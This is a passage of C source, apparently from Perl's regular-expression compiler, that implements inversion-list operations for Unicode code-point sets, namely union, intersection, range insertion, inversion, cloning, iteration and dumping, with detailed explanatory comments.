/* But if the first element is not zero, we pretend the list starts
* at the 0 that is always stored immediately before the array. */
array_b--;
len_b++;
}
}
/* Size the union for the worst case: that the sets are completely
* disjoint */
u = _new_invlist(len_a + len_b);
/* Will contain U+0000 if either component does */
array_u = _invlist_array_init(u, ( len_a > 0 && array_a[0] == 0)
|| (len_b > 0 && array_b[0] == 0));
/* Go through each input list item by item, stopping when have exhausted
* one of them */
while (i_a < len_a && i_b < len_b) {
UV cp; /* The element to potentially add to the union's array */
        bool cp_in_set; /* is it in the input list's set or not */
/* We need to take one or the other of the two inputs for the union.
* Since we are merging two sorted lists, we take the smaller of the
* next items. In case of a tie, we take first the one that is in its
* set. If we first took the one not in its set, it would decrement
* the count, possibly to 0 which would cause it to be output as ending
* the range, and the next time through we would take the same number,
* and output it again as beginning the next range. By doing it the
* opposite way, there is no possibility that the count will be
* momentarily decremented to 0, and thus the two adjoining ranges will
* be seamlessly merged. (In a tie and both are in the set or both not
* in the set, it doesn't matter which we take first.) */
if ( array_a[i_a] < array_b[i_b]
|| ( array_a[i_a] == array_b[i_b]
&& ELEMENT_RANGE_MATCHES_INVLIST(i_a)))
{
cp_in_set = ELEMENT_RANGE_MATCHES_INVLIST(i_a);
cp = array_a[i_a++];
}
else {
cp_in_set = ELEMENT_RANGE_MATCHES_INVLIST(i_b);
cp = array_b[i_b++];
}
/* Here, have chosen which of the two inputs to look at. Only output
* if the running count changes to/from 0, which marks the
* beginning/end of a range that's in the set */
if (cp_in_set) {
if (count == 0) {
array_u[i_u++] = cp;
}
count++;
}
else {
count--;
if (count == 0) {
array_u[i_u++] = cp;
}
}
}
/* The loop above increments the index into exactly one of the input lists
* each iteration, and ends when either index gets to its list end. That
* means the other index is lower than its end, and so something is
* remaining in that one. We decrement 'count', as explained below, if
* that list is in its set. (i_a and i_b each currently index the element
* beyond the one we care about.) */
if ( (i_a != len_a && PREV_RANGE_MATCHES_INVLIST(i_a))
|| (i_b != len_b && PREV_RANGE_MATCHES_INVLIST(i_b)))
{
count--;
}
/* Above we decremented 'count' if the list that had unexamined elements in
* it was in its set. This has made it so that 'count' being non-zero
* means there isn't anything left to output; and 'count' equal to 0 means
* that what is left to output is precisely that which is left in the
* non-exhausted input list.
*
* To see why, note first that the exhausted input obviously has nothing
* left to add to the union. If it was in its set at its end, that means
* the set extends from here to the platform's infinity, and hence so does
* the union and the non-exhausted set is irrelevant. The exhausted set
* also contributed 1 to 'count'. If 'count' was 2, it got decremented to
* 1, but if it was 1, the non-exhausted set wasn't in its set, and so
* 'count' remains at 1. This is consistent with the decremented 'count'
* != 0 meaning there's nothing left to add to the union.
*
* But if the exhausted input wasn't in its set, it contributed 0 to
* 'count', and the rest of the union will be whatever the other input is.
* If 'count' was 0, neither list was in its set, and 'count' remains 0;
* otherwise it gets decremented to 0. This is consistent with 'count'
* == 0 meaning the remainder of the union is whatever is left in the
* non-exhausted list. */
if (count != 0) {
len_u = i_u;
}
else {
IV copy_count = len_a - i_a;
if (copy_count > 0) { /* The non-exhausted input is 'a' */
Copy(array_a + i_a, array_u + i_u, copy_count, UV);
}
else { /* The non-exhausted input is b */
copy_count = len_b - i_b;
Copy(array_b + i_b, array_u + i_u, copy_count, UV);
}
len_u = i_u + copy_count;
}
/* Set the result to the final length, which can change the pointer to
* array_u, so re-find it. (Note that it is unlikely that this will
* change, as we are shrinking the space, not enlarging it) */
if (len_u != _invlist_len(u)) {
invlist_set_len(u, len_u, *get_invlist_offset_addr(u));
invlist_trim(u);
array_u = invlist_array(u);
}
if (*output == NULL) { /* Simply return the new inversion list */
*output = u;
}
else {
/* Otherwise, overwrite the inversion list that was in '*output'. We
* could instead free '*output', and then set it to 'u', but experience
* has shown [perl #127392] that if the input is a mortal, we can get a
* huge build-up of these during regex compilation before they get
* freed. */
invlist_replace_list_destroys_src(*output, u);
SvREFCNT_dec_NN(u);
}
return;
}
void
Perl__invlist_intersection_maybe_complement_2nd(pTHX_ SV* const a, SV* const b,
const bool complement_b, SV** i)
{
/* Take the intersection of two inversion lists and point '*i' to it. On
* input, '*i' MUST POINT TO NULL OR TO AN SV* INVERSION LIST (possibly
* even 'a' or 'b'). If to an inversion list, the contents of the original
* list will be replaced by the intersection. The first list, 'a', may be
* NULL, in which case '*i' will be an empty list. If 'complement_b' is
* TRUE, the result will be the intersection of 'a' and the complement (or
* inversion) of 'b' instead of 'b' directly.
*
* The basis for this comes from "Unicode Demystified" Chapter 13 by
* Richard Gillam, published by Addison-Wesley, and explained at some
* length there. The preface says to incorporate its examples into your
     * code at your own risk. In fact, it had bugs.
*
* The algorithm is like a merge sort, and is essentially the same as the
* union above
*/
const UV* array_a; /* a's array */
const UV* array_b;
UV len_a; /* length of a's array */
UV len_b;
SV* r; /* the resulting intersection */
UV* array_r;
UV len_r = 0;
UV i_a = 0; /* current index into a's array */
UV i_b = 0;
UV i_r = 0;
    /* running count of how many of the two inputs are positioned at ranges
* that are in their sets. As explained in the algorithm source book,
* items are stopped accumulating and are output when the count changes
* to/from 2. The count is incremented when we start a range that's in an
* input's set, and decremented when we start a range that's not in a set.
* Only when it is 2 are we in the intersection. */
UV count = 0;
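    /* A small worked example of the scheme (hypothetical inputs): with
     * a = { 5, 10 } (matching 5..9) and b = { 8, 15 } (matching 8..14), the
     * count goes to 1 at 5, reaches 2 at 8 (so 8 starts an output range),
     * and drops back to 1 at 10 (so 10 ends it), giving the intersection
     * { 8, 10 }, which matches 8..9. */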
PERL_ARGS_ASSERT__INVLIST_INTERSECTION_MAYBE_COMPLEMENT_2ND;
assert(a != b);
assert(*i == NULL || is_invlist(*i));
/* Special case if either one is empty */
len_a = (a == NULL) ? 0 : _invlist_len(a);
if ((len_a == 0) || ((len_b = _invlist_len(b)) == 0)) {
if (len_a != 0 && complement_b) {
/* Here, 'a' is not empty, therefore from the enclosing 'if', 'b'
* must be empty. Here, also we are using 'b's complement, which
* hence must be every possible code point. Thus the intersection
* is simply 'a'. */
if (*i == a) { /* No-op */
return;
}
if (*i == NULL) {
*i = invlist_clone(a, NULL);
return;
}
r = invlist_clone(a, NULL);
invlist_replace_list_destroys_src(*i, r);
SvREFCNT_dec_NN(r);
return;
}
/* Here, 'a' or 'b' is empty and not using the complement of 'b'. The
* intersection must be empty */
if (*i == NULL) {
*i = _new_invlist(0);
return;
}
invlist_clear(*i);
return;
}
/* Here both lists exist and are non-empty */
array_a = invlist_array(a);
array_b = invlist_array(b);
    /* If we are to take the intersection of 'a' with the complement of 'b',
     * set it up so we are looking at b's complement. */
if (complement_b) {
/* To complement, we invert: if the first element is 0, remove it. To
* do this, we just pretend the array starts one later */
if (array_b[0] == 0) {
array_b++;
len_b--;
}
else {
/* But if the first element is not zero, we pretend the list starts
* at the 0 that is always stored immediately before the array. */
array_b--;
len_b++;
}
}
/* Size the intersection for the worst case: that the intersection ends up
* fragmenting everything to be completely disjoint */
    r = _new_invlist(len_a + len_b);
/* Will contain U+0000 iff both components do */
array_r = _invlist_array_init(r, len_a > 0 && array_a[0] == 0
&& len_b > 0 && array_b[0] == 0);
/* Go through each list item by item, stopping when have exhausted one of
* them */
while (i_a < len_a && i_b < len_b) {
UV cp; /* The element to potentially add to the intersection's
array */
bool cp_in_set; /* Is it in the input list's set or not */
/* We need to take one or the other of the two inputs for the
* intersection. Since we are merging two sorted lists, we take the
* smaller of the next items. In case of a tie, we take first the one
* that is not in its set (a difference from the union algorithm). If
* we first took the one in its set, it would increment the count,
* possibly to 2 which would cause it to be output as starting a range
* in the intersection, and the next time through we would take that
* same number, and output it again as ending the set. By doing the
* opposite of this, there is no possibility that the count will be
* momentarily incremented to 2. (In a tie and both are in the set or
* both not in the set, it doesn't matter which we take first.) */
if ( array_a[i_a] < array_b[i_b]
|| ( array_a[i_a] == array_b[i_b]
&& ! ELEMENT_RANGE_MATCHES_INVLIST(i_a)))
{
cp_in_set = ELEMENT_RANGE_MATCHES_INVLIST(i_a);
cp = array_a[i_a++];
}
else {
cp_in_set = ELEMENT_RANGE_MATCHES_INVLIST(i_b);
            cp = array_b[i_b++];
}
/* Here, have chosen which of the two inputs to look at. Only output
* if the running count changes to/from 2, which marks the
* beginning/end of a range that's in the intersection */
if (cp_in_set) {
count++;
if (count == 2) {
array_r[i_r++] = cp;
}
}
else {
if (count == 2) {
array_r[i_r++] = cp;
}
count--;
}
}
/* The loop above increments the index into exactly one of the input lists
* each iteration, and ends when either index gets to its list end. That
* means the other index is lower than its end, and so something is
* remaining in that one. We increment 'count', as explained below, if the
* exhausted list was in its set. (i_a and i_b each currently index the
* element beyond the one we care about.) */
if ( (i_a == len_a && PREV_RANGE_MATCHES_INVLIST(i_a))
|| (i_b == len_b && PREV_RANGE_MATCHES_INVLIST(i_b)))
{
count++;
}
/* Above we incremented 'count' if the exhausted list was in its set. This
* has made it so that 'count' being below 2 means there is nothing left to
     * output; otherwise what's left to add to the intersection is precisely
* that which is left in the non-exhausted input list.
*
* To see why, note first that the exhausted input obviously has nothing
* left to affect the intersection. If it was in its set at its end, that
* means the set extends from here to the platform's infinity, and hence
* anything in the non-exhausted's list will be in the intersection, and
* anything not in it won't be. Hence, the rest of the intersection is
     * precisely what's in the non-exhausted list. The exhausted set also
* contributed 1 to 'count', meaning 'count' was at least 1. Incrementing
* it means 'count' is now at least 2. This is consistent with the
     * incremented 'count' being >= 2 meaning that the non-exhausted list is
     * to be added to the intersection.
*
* But if the exhausted input wasn't in its set, it contributed 0 to
* 'count', and the intersection can't include anything further; the
* non-exhausted set is irrelevant. 'count' was at most 1, and doesn't get
* incremented. This is consistent with 'count' being < 2 meaning nothing
* further to add to the intersection. */
if (count < 2) { /* Nothing left to put in the intersection. */
len_r = i_r;
}
else { /* copy the non-exhausted list, unchanged. */
IV copy_count = len_a - i_a;
if (copy_count > 0) { /* a is the one with stuff left */
Copy(array_a + i_a, array_r + i_r, copy_count, UV);
}
else { /* b is the one with stuff left */
copy_count = len_b - i_b;
Copy(array_b + i_b, array_r + i_r, copy_count, UV);
}
len_r = i_r + copy_count;
}
/* Set the result to the final length, which can change the pointer to
* array_r, so re-find it. (Note that it is unlikely that this will
* change, as we are shrinking the space, not enlarging it) */
if (len_r != _invlist_len(r)) {
invlist_set_len(r, len_r, *get_invlist_offset_addr(r));
invlist_trim(r);
array_r = invlist_array(r);
}
if (*i == NULL) { /* Simply return the calculated intersection */
*i = r;
}
else { /* Otherwise, replace the existing inversion list in '*i'. We could
instead free '*i', and then set it to 'r', but experience has
shown [perl #127392] that if the input is a mortal, we can get a
huge build-up of these during regex compilation before they get
freed. */
if (len_r) {
invlist_replace_list_destroys_src(*i, r);
}
else {
invlist_clear(*i);
}
SvREFCNT_dec_NN(r);
}
return;
}
SV*
Perl__add_range_to_invlist(pTHX_ SV* invlist, UV start, UV end)
{
/* Add the range from 'start' to 'end' inclusive to the inversion list's
* set. A pointer to the inversion list is returned. This may actually be
* a new list, in which case the passed in one has been destroyed. The
* passed-in inversion list can be NULL, in which case a new one is created
* with just the one range in it. The new list is not necessarily
* NUL-terminated. Space is not freed if the inversion list shrinks as a
* result of this function. The gain would not be large, and in many
* cases, this is called multiple times on a single inversion list, so
* anything freed may almost immediately be needed again.
*
* This used to mostly call the 'union' routine, but that is much more
* heavyweight than really needed for a single range addition */
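    /* As a conceptual example (hypothetical values): adding the range 12..14
     * to the list { 10, 12 }, which matches 10..11, just extends its final
     * range, yielding { 10, 15 }, which matches 10..14. */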
UV* array; /* The array implementing the inversion list */
UV len; /* How many elements in 'array' */
SSize_t i_s; /* index into the invlist array where 'start'
should go */
SSize_t i_e = 0; /* And the index where 'end' should go */
UV cur_highest; /* The highest code point in the inversion list
upon entry to this function */
/* This range becomes the whole inversion list if none already existed */
if (invlist == NULL) {
invlist = _new_invlist(2);
_append_range_to_invlist(invlist, start, end);
return invlist;
}
/* Likewise, if the inversion list is currently empty */
len = _invlist_len(invlist);
if (len == 0) {
_append_range_to_invlist(invlist, start, end);
return invlist;
}
/* Starting here, we have to know the internals of the list */
array = invlist_array(invlist);
/* If the new range ends higher than the current highest ... */
cur_highest = invlist_highest(invlist);
if (end > cur_highest) {
/* If the whole range is higher, we can just append it */
if (start > cur_highest) {
_append_range_to_invlist(invlist, start, end);
return invlist;
}
/* Otherwise, add the portion that is higher ... */
_append_range_to_invlist(invlist, cur_highest + 1, end);
/* ... and continue on below to handle the rest. As a result of the
* above append, we know that the index of the end of the range is the
* final even numbered one of the array. Recall that the final element
* always starts a range that extends to infinity. If that range is in
* the set (meaning the set goes from here to infinity), it will be an
* even index, but if it isn't in the set, it's odd, and the final
* range in the set is one less, which is even. */
if (end == UV_MAX) {
i_e = len;
}
else {
i_e = len - 2;
}
}
/* We have dealt with appending, now see about prepending. If the new
* range starts lower than the current lowest ... */
if (start < array[0]) {
/* Adding something which has 0 in it is somewhat tricky, and uncommon.
* Let the union code handle it, rather than having to know the
* trickiness in two code places. */
if (UNLIKELY(start == 0)) {
SV* range_invlist;
range_invlist = _new_invlist(2);
_append_range_to_invlist(range_invlist, start, end);
_invlist_union(invlist, range_invlist, &invlist);
SvREFCNT_dec_NN(range_invlist);
return invlist;
}
/* If the whole new range comes before the first entry, and doesn't
* extend it, we have to insert it as an additional range */
if (end < array[0] - 1) {
i_s = i_e = -1;
goto splice_in_new_range;
}
/* Here the new range adjoins the existing first range, extending it
* downwards. */
array[0] = start;
/* And continue on below to handle the rest. We know that the index of
* the beginning of the range is the first one of the array */
i_s = 0;
}
else { /* Not prepending any part of the new range to the existing list.
* Find where in the list it should go. This finds i_s, such that:
* invlist[i_s] <= start < array[i_s+1]
*/
i_s = _invlist_search(invlist, start);
}
/* At this point, any extending before the beginning of the inversion list
* and/or after the end has been done. This has made it so that, in the
* code below, each endpoint of the new range is either in a range that is
* in the set, or is in a gap between two ranges that are. This means we
* don't have to worry about exceeding the array bounds.
*
* Find where in the list the new range ends (but we can skip this if we
* have already determined what it is, or if it will be the same as i_s,
* which we already have computed) */
if (i_e == 0) {
i_e = (start == end)
? i_s
: _invlist_search(invlist, end);
}
/* Here generally invlist[i_e] <= end < array[i_e+1]. But if invlist[i_e]
* is a range that goes to infinity there is no element at invlist[i_e+1],
* so only the first relation holds. */
if ( ! ELEMENT_RANGE_MATCHES_INVLIST(i_s)) {
/* Here, the ranges on either side of the beginning of the new range
* are in the set, and this range starts in the gap between them.
*
* The new range extends the range above it downwards if the new range
* ends at or above that range's start */
const bool extends_the_range_above = ( end == UV_MAX
|| end + 1 >= array[i_s+1]);
/* The new range extends the range below it upwards if it begins just
* after where that range ends */
if (start == array[i_s]) {
/* If the new range fills the entire gap between the other ranges,
* they will get merged together. Other ranges may also get
* merged, depending on how many of them the new range spans. In
* the general case, we do the merge later, just once, after we
* figure out how many to merge. But in the case where the new
* range exactly spans just this one gap (possibly extending into
* the one above), we do the merge here, and an early exit. This
* is done here to avoid having to special case later. */
if (i_e - i_s <= 1) {
/* If i_e - i_s == 1, it means that the new range terminates
* within the range above, and hence 'extends_the_range_above'
* must be true. (If the range above it extends to infinity,
* 'i_s+2' will be above the array's limit, but 'len-i_s-2'
* will be 0, so no harm done.) */
if (extends_the_range_above) {
Move(array + i_s + 2, array + i_s, len - i_s - 2, UV);
invlist_set_len(invlist,
len - 2,
*(get_invlist_offset_addr(invlist)));
return invlist;
}
/* Here, i_e must == i_s. We keep them in sync, as they apply
* to the same range, and below we are about to decrement i_s
* */
i_e--;
}
/* Here, the new range is adjacent to the one below. (It may also
* span beyond the range above, but that will get resolved later.)
* Extend the range below to include this one. */
array[i_s] = (end == UV_MAX) ? UV_MAX : end + 1;
i_s--;
start = array[i_s];
}
else if (extends_the_range_above) {
/* Here the new range only extends the range above it, but not the
* one below. It merges with the one above. Again, we keep i_e
* and i_s in sync if they point to the same range */
if (i_e == i_s) {
i_e++;
}
i_s++;
array[i_s] = start;
}
}
/* Here, we've dealt with the new range start extending any adjoining
* existing ranges.
*
* If the new range extends to infinity, it is now the final one,
* regardless of what was there before */
if (UNLIKELY(end == UV_MAX)) {
invlist_set_len(invlist, i_s + 1, *(get_invlist_offset_addr(invlist)));
return invlist;
}
/* If i_e started as == i_s, it has also been dealt with,
* and been updated to the new i_s, which will fail the following if */
if (! ELEMENT_RANGE_MATCHES_INVLIST(i_e)) {
/* Here, the ranges on either side of the end of the new range are in
* the set, and this range ends in the gap between them.
*
* If this range is adjacent to (hence extends) the range above it, it
* becomes part of that range; likewise if it extends the range below,
* it becomes part of that range */
if (end + 1 == array[i_e+1]) {
i_e++;
array[i_e] = start;
}
else if (start <= array[i_e]) {
array[i_e] = end + 1;
i_e--;
}
}
if (i_s == i_e) {
/* If the range fits entirely in an existing range (as possibly already
* extended above), it doesn't add anything new */
if (ELEMENT_RANGE_MATCHES_INVLIST(i_s)) {
return invlist;
}
/* Here, no part of the range is in the list. Must add it. It will
* occupy 2 more slots */
splice_in_new_range:
invlist_extend(invlist, len + 2);
array = invlist_array(invlist);
/* Move the rest of the array down two slots. Don't include any
* trailing NUL */
Move(array + i_e + 1, array + i_e + 3, len - i_e - 1, UV);
/* Do the actual splice */
array[i_e+1] = start;
array[i_e+2] = end + 1;
invlist_set_len(invlist, len + 2, *(get_invlist_offset_addr(invlist)));
return invlist;
}
/* Here the new range crossed the boundaries of a pre-existing range. The
* code above has adjusted things so that both ends are in ranges that are
* in the set. This means everything in between must also be in the set.
* Just squash things together */
Move(array + i_e + 1, array + i_s + 1, len - i_e - 1, UV);
invlist_set_len(invlist,
len - i_e + i_s,
*(get_invlist_offset_addr(invlist)));
return invlist;
}
SV*
Perl__setup_canned_invlist(pTHX_ const STRLEN size, const UV element0,
UV** other_elements_ptr)
{
/* Create and return an inversion list whose contents are to be populated
* by the caller. The caller gives the number of elements (in 'size') and
* the very first element ('element0'). This function will set
* '*other_elements_ptr' to an array of UVs, where the remaining elements
* are to be placed.
*
* Obviously there is some trust involved that the caller will properly
* fill in the other elements of the array.
*
* (The first element needs to be passed in, as the underlying code does
* things differently depending on whether it is zero or non-zero) */
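    /* A hypothetical caller might do:
     *      UV *rest;
     *      SV *il = _setup_canned_invlist(3, 0x41, &rest);
     *      rest[0] = 0x5B;     (one past 'Z', ending the first range)
     *      rest[1] = 0x61;     ('a', starting a range that extends onward)
     * which yields a list matching 'A'..'Z' plus 0x61 upwards. */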
SV* invlist = _new_invlist(size);
bool offset;
PERL_ARGS_ASSERT__SETUP_CANNED_INVLIST;
invlist = add_cp_to_invlist(invlist, element0);
offset = *get_invlist_offset_addr(invlist);
invlist_set_len(invlist, size, offset);
*other_elements_ptr = invlist_array(invlist) + 1;
return invlist;
}
#endif
PERL_STATIC_INLINE SV*
S_add_cp_to_invlist(pTHX_ SV* invlist, const UV cp) {
return _add_range_to_invlist(invlist, cp, cp);
}
#ifndef PERL_IN_XSUB_RE
void
Perl__invlist_invert(pTHX_ SV* const invlist)
{
/* Complement the input inversion list. This adds a 0 if the list didn't
* have a zero; removes it otherwise. As described above, the data
* structure is set up so that this is very efficient */
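    /* For example (hypothetical list): the complement of { 10, 20 }, which
     * matches 10..19, is { 0, 10, 20 }, matching 0..9 and 20..infinity.
     * Because a 0 is always stored just before the nominal start of the
     * array, flipping the offset bit is all that is needed. */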
PERL_ARGS_ASSERT__INVLIST_INVERT;
assert(! invlist_is_iterating(invlist));
/* The inverse of matching nothing is matching everything */
if (_invlist_len(invlist) == 0) {
_append_range_to_invlist(invlist, 0, UV_MAX);
return;
}
*get_invlist_offset_addr(invlist) = ! *get_invlist_offset_addr(invlist);
}
SV*
Perl_invlist_clone(pTHX_ SV* const invlist, SV* new_invlist)
{
/* Return a new inversion list that is a copy of the input one, which is
* unchanged. The new list will not be mortal even if the old one was. */
const STRLEN nominal_length = _invlist_len(invlist);
const STRLEN physical_length = SvCUR(invlist);
const bool offset = *(get_invlist_offset_addr(invlist));
PERL_ARGS_ASSERT_INVLIST_CLONE;
if (new_invlist == NULL) {
new_invlist = _new_invlist(nominal_length);
}
else {
sv_upgrade(new_invlist, SVt_INVLIST);
initialize_invlist_guts(new_invlist, nominal_length);
}
*(get_invlist_offset_addr(new_invlist)) = offset;
invlist_set_len(new_invlist, nominal_length, offset);
Copy(SvPVX(invlist), SvPVX(new_invlist), physical_length, char);
return new_invlist;
}
#endif
PERL_STATIC_INLINE STRLEN*
S_get_invlist_iter_addr(SV* invlist)
{
/* Return the address of the UV that contains the current iteration
* position */
PERL_ARGS_ASSERT_GET_INVLIST_ITER_ADDR;
assert(is_invlist(invlist));
return &(((XINVLIST*) SvANY(invlist))->iterator);
}
PERL_STATIC_INLINE void
S_invlist_iterinit(SV* invlist) /* Initialize iterator for invlist */
{
PERL_ARGS_ASSERT_INVLIST_ITERINIT;
*get_invlist_iter_addr(invlist) = 0;
}
PERL_STATIC_INLINE void
S_invlist_iterfinish(SV* invlist)
{
/* Terminate iterator for invlist. This is to catch development errors.
* Any iteration that is interrupted before completed should call this
* function. Functions that add code points anywhere else but to the end
* of an inversion list assert that they are not in the middle of an
* iteration. If they were, the addition would make the iteration
* problematical: if the iteration hadn't reached the place where things
* were being added, it would be ok */
PERL_ARGS_ASSERT_INVLIST_ITERFINISH;
*get_invlist_iter_addr(invlist) = (STRLEN) UV_MAX;
}
STATIC bool
S_invlist_iternext(SV* invlist, UV* start, UV* end)
{
/* An C<invlist_iterinit> call on <invlist> must be used to set this up.
* This call sets in <*start> and <*end>, the next range in <invlist>.
* Returns <TRUE> if successful and the next call will return the next
* range; <FALSE> if was already at the end of the list. If the latter,
* <*start> and <*end> are unchanged, and the next call to this function
* will start over at the beginning of the list */
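    /* The typical usage pattern (as in invlist_contents() below) is:
     *      invlist_iterinit(invlist);
     *      while (invlist_iternext(invlist, &start, &end)) {
     *          ... process the range start..end ...
     *      }
     * with invlist_iterfinish() called if the iteration is abandoned early. */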
STRLEN* pos = get_invlist_iter_addr(invlist);
UV len = _invlist_len(invlist);
UV *array;
PERL_ARGS_ASSERT_INVLIST_ITERNEXT;
if (*pos >= len) {
*pos = (STRLEN) UV_MAX; /* Force iterinit() to be required next time */
return FALSE;
}
array = invlist_array(invlist);
*start = array[(*pos)++];
if (*pos >= len) {
*end = UV_MAX;
}
else {
*end = array[(*pos)++] - 1;
}
return TRUE;
}
PERL_STATIC_INLINE UV
S_invlist_highest(SV* const invlist)
{
/* Returns the highest code point that matches an inversion list. This API
     * has an ambiguity, as it returns 0 either when the highest is actually
     * 0, or when the list is empty. If this distinction matters to you, check
* for emptiness before calling this function */
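    /* For example (hypothetical lists): for { 10, 20 }, matching 10..19, the
     * highest code point is 19; for { 10 }, matching 10..infinity, it is
     * UV_MAX. */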
UV len = _invlist_len(invlist);
UV *array;
PERL_ARGS_ASSERT_INVLIST_HIGHEST;
if (len == 0) {
return 0;
}
array = invlist_array(invlist);
/* The last element in the array in the inversion list always starts a
* range that goes to infinity. That range may be for code points that are
* matched in the inversion list, or it may be for ones that aren't
* matched. In the latter case, the highest code point in the set is one
* less than the beginning of this range; otherwise it is the final element
* of this range: infinity */
return (ELEMENT_RANGE_MATCHES_INVLIST(len - 1))
? UV_MAX
: array[len - 1] - 1;
}
STATIC SV *
S_invlist_contents(pTHX_ SV* const invlist, const bool traditional_style)
{
/* Get the contents of an inversion list into a string SV so that they can
* be printed out. If 'traditional_style' is TRUE, it uses the format
* traditionally done for debug tracing; otherwise it uses a format
* suitable for just copying to the output, with blanks between ranges and
* a dash between range components */
UV start, end;
SV* output;
const char intra_range_delimiter = (traditional_style ? '\t' : '-');
const char inter_range_delimiter = (traditional_style ? '\n' : ' ');
if (traditional_style) {
output = newSVpvs("\n");
}
else {
output = newSVpvs("");
}
PERL_ARGS_ASSERT_INVLIST_CONTENTS;
assert(! invlist_is_iterating(invlist));
invlist_iterinit(invlist);
while (invlist_iternext(invlist, &start, &end)) {
if (end == UV_MAX) {
Perl_sv_catpvf(aTHX_ output, "%04" UVXf "%cINFTY%c",
start, intra_range_delimiter,
inter_range_delimiter);
}
else if (end != start) {
Perl_sv_catpvf(aTHX_ output, "%04" UVXf "%c%04" UVXf "%c",
start,
intra_range_delimiter,
end, inter_range_delimiter);
}
else {
Perl_sv_catpvf(aTHX_ output, "%04" UVXf "%c",
start, inter_range_delimiter);
}
}
if (SvCUR(output) && ! traditional_style) {/* Get rid of trailing blank */
SvCUR_set(output, SvCUR(output) - 1);
}
return output;
}
#ifndef PERL_IN_XSUB_RE
void
Perl__invlist_dump(pTHX_ PerlIO *file, I32 level,
const char * const indent, SV* const invlist)
{
/* Designed to be called only by do_sv_dump(). Dumps out the ranges of the
     * inversion list 'invlist' to 'file' at 'level'. Each line is prefixed by
* the string 'indent'. The output looks like this:
[0] 0x000A .. 0x000D
[2] 0x0085
[4] 0x2028 .. 0x2029
[6] 0x3104 .. INFTY
     * This means that the first range of code points matched by the list is
* 0xA through 0xD; the second range contains only the single code point
* 0x85, etc. An inversion list is an array of UVs. Two array elements
* are used to define each range (except if the final range extends to
* infinity, only a single element is needed). The array index of the
* first element for the corresponding range is given in brackets. */
UV start, end;
STRLEN count = 0;
PERL_ARGS_ASSERT__INVLIST_DUMP;
if (invlist_is_iterating(invlist)) {
Perl_dump_indent(aTHX_ level, file,
"%sCan't dump inversion list because is in middle of iterating\n",
indent);
return;
}
invlist_iterinit(invlist);
while (invlist_iternext(invlist, &start, &end)) {
if (end == UV_MAX) {
Perl_dump_indent(aTHX_ level, file,
"%s[%" UVuf "] 0x%04" UVXf " .. INFTY\n",
indent, (UV)count, start);
}
else if (end != start) {
Perl_dump_indent(aTHX_ level, file,
"%s[%" UVuf "] 0x%04" UVXf " .. 0x%04" UVXf "\n",
indent, (UV)count, start, end);
}
else {
Perl_dump_indent(aTHX_ level, file, "%s[%" UVuf "] 0x%04" UVXf "\n",
indent, (UV)count, start);
}
count += 2;
}
}
#endif
#if defined(PERL_ARGS_ASSERT__INVLISTEQ) && !defined(PERL_IN_XSUB_RE)
bool
Perl__invlistEQ(pTHX_ SV* const a, SV* const b, const bool complement_b)
{
/* Return a boolean as to if the two passed in inversion lists are
* identical. The final argument, if TRUE, says to take the complement of
* the second inversion list before doing the comparison */
const UV len_a = _invlist_len(a);
UV len_b = _invlist_len(b);
const UV* array_a = NULL;
const UV* array_b = NULL;
PERL_ARGS_ASSERT__INVLISTEQ;
/* This code avoids accessing the arrays unless it knows the length is
* non-zero */
if (len_a == 0) {
if (len_b == 0) {
return ! complement_b;
}
}
else {
array_a = invlist_array(a);
}
if (len_b != 0) {
array_b = invlist_array(b);
}
    /* If we are to compare 'a' with the complement of 'b', set it
     * up so we are looking at b's complement. */
if (complement_b) {
/* The complement of nothing is everything, so <a> would have to have
* just one element, starting at zero (ending at infinity) */
if (len_b == 0) {
return (len_a == 1 && array_a[0] == 0);
}
if (array_b[0] == 0) {
/* Otherwise, to complement, we invert. Here, the first element is
* 0, just remove it. To do this, we just pretend the array starts
* one later */
array_b++;
len_b--;
}
else {
/* But if the first element is not zero, we pretend the list starts
* at the 0 that is always stored immediately before the array. */
array_b--;
len_b++;
}
}
return len_a == len_b
&& memEQ(array_a, array_b, len_a * sizeof(array_a[0]));
}
#endif
/*
* As best we can, determine the characters that can match the start of
* the given EXACTF-ish node. This is for use in creating ssc nodes, so there
* can be false positive matches
*
* Returns the invlist as a new SV*; it is the caller's responsibility to
* call SvREFCNT_dec() when done with it.
*/
STATIC SV*
S__make_exactf_invlist(pTHX_ RExC_state_t *pRExC_state, regnode *node)
{
dVAR;
const U8 * s = (U8*)STRING(node);
SSize_t bytelen = STR_LEN(node);
UV uc;
/* Start out big enough for 2 separate code points */
SV* invlist = _new_invlist(4);
PERL_ARGS_ASSERT__MAKE_EXACTF_INVLIST;
if (! UTF) {
uc = *s;
/* We punt and assume can match anything if the node begins
* with a multi-character fold. Things are complicated. For
* example, /ffi/i could match any of:
* "\N{LATIN SMALL LIGATURE FFI}"
* "\N{LATIN SMALL LIGATURE FF}I"
* "F\N{LATIN SMALL LIGATURE FI}"
* plus several other things; and making sure we have all the
* possibilities is hard. */
if (is_MULTI_CHAR_FOLD_latin1_safe(s, s + bytelen)) {
invlist = _add_range_to_invlist(invlist, 0, UV_MAX);
}
else {
/* Any Latin1 range character can potentially match any
* other depending on the locale, and in Turkic locales, U+130 and
* U+131 */
if (OP(node) == EXACTFL) {
_invlist_union(invlist, PL_Latin1, &invlist);
invlist = add_cp_to_invlist(invlist,
LATIN_SMALL_LETTER_DOTLESS_I);
invlist = add_cp_to_invlist(invlist,
LATIN_CAPITAL_LETTER_I_WITH_DOT_ABOVE);
}
else {
/* But otherwise, it matches at least itself. We can
* quickly tell if it has a distinct fold, and if so,
* it matches that as well */
invlist = add_cp_to_invlist(invlist, uc);
if (IS_IN_SOME_FOLD_L1(uc))
invlist = add_cp_to_invlist(invlist, PL_fold_latin1[uc]);
}
/* Some characters match above-Latin1 ones under /i. This
* is true of EXACTFL ones when the locale is UTF-8 */
if (HAS_NONLATIN1_SIMPLE_FOLD_CLOSURE(uc)
&& (! isASCII(uc) || (OP(node) != EXACTFAA
&& OP(node) != EXACTFAA_NO_TRIE)))
{
add_above_Latin1_folds(pRExC_state, (U8) uc, &invlist);
}
}
}
else { /* Pattern is UTF-8 */
U8 folded[UTF8_MAX_FOLD_CHAR_EXPAND * UTF8_MAXBYTES_CASE + 1] = { '\0' };
const U8* e = s + bytelen;
IV fc;
fc = uc = utf8_to_uvchr_buf(s, s + bytelen, NULL);
/* The only code points that aren't folded in a UTF EXACTFish
         * node are the problematic ones in EXACTFL nodes */
if (OP(node) == EXACTFL && is_PROBLEMATIC_LOCALE_FOLDEDS_START_cp(uc)) {
/* We need to check for the possibility that this EXACTFL
* node begins with a multi-char fold. Therefore we fold
* the first few characters of it so that we can make that
* check */
U8 *d = folded;
int i;
fc = -1;
